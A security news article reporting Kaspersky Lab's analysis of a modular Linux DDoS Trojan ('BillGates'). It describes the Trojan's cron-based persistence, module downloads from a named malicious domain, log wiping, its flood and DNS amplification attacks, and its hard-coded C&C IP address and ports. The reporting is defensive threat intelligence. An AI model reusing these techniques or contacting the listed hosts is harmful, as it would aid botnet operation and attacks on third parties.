Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

Kaspersky Lab Details ‘Versatile’ DDoS Trojan for Linux Systems

Researchers at Kaspersky Lab have published a detailed analysis of a “versatile” Linux DDoS Trojan available online.

Researchers at Kaspersky Lab have published a detailed analysis of a “versatile” Linux DDoS Trojan available online.

In a blog post, Kaspersky Lab’s Mikhail Kuzin explained that the firm came across an article published in February on a Russian IT website titled ‘Studying the BillGates Linux Botnet’ that described a Trojan with DDoS functionality. 

“The capability that we found the most interesting was the Trojan’s ability to conduct DNS Amplification-type attacks,” wrote Kuzin, a junior malware analyst at Kaspersky Lab. “In addition, it followed from the article that the Trojan had a sophisticated modular structure, something we had not seen in the world of Linux malware before.”

The article provided a link to download all of the Trojan’s files. The archive contained a number of files that were all modules of the same Trojan: atddd; cupsdd; cupsddh; ksapdd; kysapdd; skysapdd; and xfsdxd. The files cupsdd and cupsddh are detected by Kaspersky Lab as Backdoor.Linux.Ganiw.a, while atddd and the remaining files are detected as Backdoor.Linux.Mayday.f. The archive with the files also contained a configuration file for cron – the Linux task scheduler. In this case, Kuzin stated, the utility is used to get a foothold on the system.

Trojan uses cron to perform a number of tests. Once a minute it terminates the processes of all applications that can interfere with its operation: .IptabLes, nfsd4, profild.key, nfsd, DDosl, lengchao32, b26, codelove and node24. In addition, roughly once every 90 minutes it terminates all of its processes, and every two hours or so it downloads all of its components to the /etc folder from http://www.dgnfd564sdf.com:8080/[module_name] (module_name = name of the Trojan’s module, e.g., cupsdd), after deleting these files from the /etc folder. It also re-launches all of its modules every 90 minutes and purges system logs and bash command history and execute chmod 7777 [module_name] every minute.

“During subsequent analysis of the files, we did not find any code responsible for saving the config file for cron,” the researcher noted. “Most likely, the file was manually downloaded to the victim machine by a cybercriminal after gaining remote access to the system.”

The file atddd is a backdoor designed to conduct various types of DDoS attacks against the servers specified. The backdoor begins by calling the function daemon(1, 0), continuing to run in the background and redirecting standard input, output and errors to /dev/null, the researcher explained. Next it collects information about the system, and then decrypts strings defining the command and control server’s IP address and port number.

Eventually, the C&C passes along commands to attack using UDP floods, TCP floods, ICMP floods and DNS flood attacks.

Advertisement. Scroll to continue reading.

Cupsdd (Backdoor.Linux.Ganiw.a) is also designed to carry out various types of DDoS attacks, but is more feature-rich and sophisticated, Kuzin blogged. In the case of Cupsddh, also detected as Backdoor.Linux.Ganiw.a, includes an attack that allows for DNS amplification.

The last attack type on the list above is different in that packets are sent to vulnerable DNS servers, with the attack target specified as the sender’s IP address,” Kuzin blogged. “As a result, the cybercriminal sends a small packet with a DNS request and the DNS server responds to the attack target with a significantly larger packet. The list of vulnerable DNS servers is stored in the file libamplify.so, which is written to disk following the relevant command from the C&C.”

Recently, an updated a version of the Trojan has appeared with new functions. The most significant changes were made to the Gates module – cupsdd. It now has three modes – the installation and update mode; the monitoring mode, where it writes the PID of the current process to the file /tmp/moni.lock and starts threads to monitor the Bill module and the Gates module in controlling the Bill module. The final mode is for controlling the Bill module and operates the exact same way as it did in the previous version of the Trojan.

“To summarize, in the new version of the Trojan its authors have added a little ‘robustness’ without making any significant functionality changes,” Kuzin blogged. “It is also worth noting that the hard-coded IP address of the C&C server has remained the same (116.10.189.246) in this version, but the port number has changed – it is now 36008 instead of 30000 in the previous version.”

More detail can be found here.

Written By

Marketing professional with a background in journalism and a focus on IT security.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Understand how to go beyond effectively communicating new security strategies and recommendations.

Register

Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.